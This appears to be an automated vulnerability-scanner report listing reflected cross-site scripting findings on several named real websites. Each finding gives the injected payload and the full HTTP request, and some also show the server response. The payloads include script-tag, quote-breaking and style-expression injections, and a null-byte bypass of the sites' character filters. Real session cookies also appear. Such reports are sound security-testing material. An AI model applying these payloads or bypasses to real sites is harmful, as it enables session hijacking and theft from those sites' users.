GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C863f5(a)6ceac5198b/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1 Host: www.actividentity.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62283<script>alert(1)</script>7bc530bad97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /62283<script>alert(1)</script>7bc530bad97/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1 Host: www.actividentity.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5721a(a)e0872078c2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e535721a(a)e0872078c2d/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1 Host: www.actividentity.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload da714(a)a22d71e7157 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimageda714(a)a22d71e7157/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1 Host: www.actividentity.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4c759(a)e999cc0505a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf4c759(a)e999cc0505a?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1 Host: www.actividentity.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724aa"style%3d"x%3aexpr/**/ession(alert(1))"0d3fc4acadb was submitted in the email parameter. This input was echoed as 724aa"style="x:expr/**/ession(alert(1))"0d3fc4acadb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the instance_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1b1"><script>alert(1)</script>2abb0614564 was submitted in the instance_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the lastpage request parameter is copied into the HTML document as plain text between tags. The payload 70f69<script>alert(1)</script>13cb3a90beb was submitted in the lastpage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fcachecommand%3Dbypass70f69<script>alert(1)</script>13cb3a90beb&loadtime=0.55 HTTP/1.1 Host: www.afreshbunch.com Proxy-Connection: keep-alive Referer: http://www.afreshbunch.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: site=referring%5Fsite=; ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF
The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d39c'%3balert(1)//86fb6401f85 was submitted in the lpip parameter. This input was echoed as 8d39c';alert(1)//86fb6401f85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking202/static/landing.php?lpip=923178d39c'%3balert(1)//86fb6401f85 HTTP/1.1 Host: www.directbrand.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:52:39 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 3186 Connection: close Content-Type: text/html
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '923178d39c';alert(1)//86fb6401f85'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2'); var ...[SNIP]...
4.47. http://www.directbrand.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.directbrand.com
Path:
/tracking202/static/landing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89acf'%3balert(1)//3bd7e7a69f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89acf';alert(1)//3bd7e7a69f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking202/static/landing.php?lpip=9/89acf'%3balert(1)//3bd7e7a69f2317 HTTP/1.1 Host: www.directbrand.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:52:39 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 3186 Connection: close Content-Type: text/html
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '9/89acf';alert(1)//3bd7e7a69f2317'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2');
The value of the bookingSourceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9769d'%3balert(1)//7010dea1bfa was submitted in the bookingSourceId parameter. This input was echoed as 9769d';alert(1)//7010dea1bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa HTTP/1.1 Host: www.genbook.com Proxy-Connection: keep-alive Referer: http://www.afreshbunch.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0011ed5'-alert(1)-'ced209a762a was submitted in the d parameter. This input was echoed as 11ed5'-alert(1)-'ced209a762a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%0011ed5'-alert(1)-'ced209a762a&t=634335774686696206 HTTP/1.1 Host: www.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.merrilledge.com/m/pages/global-oao.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id ...[SNIP]... <script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('cdd93d9b-236f-4d83-88ef-18c94a3729cb', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%0011ed5'-alert(1)-'ced209a762a&t=634335774686696206', "Invalid viewstate.");</script> ...[SNIP]...
4.50. http://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/global-oao.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0028c00"><script>alert(1)</script>51f61b3f956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28c00"><script>alert(1)</script>51f61b3f956 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /m/pages/global-oao.aspx?%0028c00"><script>alert(1)</script>51f61b3f956=1 HTTP/1.1 Host: www.merrilledge.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00da6ca'-alert(1)-'2461730ea55 was submitted in the d parameter. This input was echoed as da6ca'-alert(1)-'2461730ea55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%00da6ca'-alert(1)-'2461730ea55&t=634335774460333397 HTTP/1.1 Host: www.merrilledge.com Connection: keep-alive Referer: https://www.merrilledge.com/m/pages/home.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id ...[SNIP]... <script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('7359dd1a-7ee0-4a0b-9a37-57a4db53bd63', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%00da6ca'-alert(1)-'2461730ea55&t=634335774460333397', "Invalid character in a Base-64 string.");</script> ...[SNIP]...
4.52. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dfd72"><script>alert(1)</script>3b54af6fcbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfd72"><script>alert(1)</script>3b54af6fcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /m/pages/home.aspx?%00dfd72"><script>alert(1)</script>3b54af6fcbc=1 HTTP/1.1 Host: www.merrilledge.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.53. http://www.secureconnect.com/rssReplayProxy.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.secureconnect.com
Path:
/rssReplayProxy.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0842%3balert(1)//395063d27b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0842;alert(1)//395063d27b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rssReplayProxy.php?cache=true&source=sec/c0842%3balert(1)//395063d27b0ure1 HTTP/1.1 Host: www.secureconnect.com Proxy-Connection: keep-alive Referer: http://www.secureconnect.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmc=32024892; __utmb=32024892.2.10.1303775103
The value of the source request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1a571%3balert(1)//bd3ba58ca17 was submitted in the source parameter. This input was echoed as 1a571;alert(1)//bd3ba58ca17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1 Host: www.secureconnect.com Proxy-Connection: keep-alive Referer: http://www.secureconnect.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmc=32024892; __utmb=32024892.2.10.1303775103
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a49'-alert(1)-'60927c08fe6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /st?ad_type=ad&ad_size=728x90§ion=1712152 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a1a49'-alert(1)-'60927c08fe6 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:52 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Tue, 26 Apr 2011 13:46:52 GMT Content-Length: 359
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 75f59<a>71ad99134ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /config/14606948?type=moogaloop_embed&referrer=http%3A%2F%2Fwww.hugthecloud.com%2F&fullscreen=1&color=00ADEF&autoplay=0&server=vimeo.com&show_title=1&loop=0&show_byline=1&player_server=player.vimeo.com&show_portrait=1&cdn_server=a.vimeocdn.com HTTP/1.1 Host: player.vimeo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=75f59<a>71ad99134ed Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256147786.1303747424.3.3.utmcsr=customermagnetism.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=256147786.658057560.1303432520.1303575918.1303747424.3
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 22b9a<script>alert(1)</script>2f6897011f9 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload bdd23<script>alert(1)</script>c65f51aafdf was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 5d13e<script>alert(1)</script>263d747e74f was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 44c04<script>alert(1)</script>db3d641228c was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 934b1<script>alert(1)</script>b9c17a19ff1 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
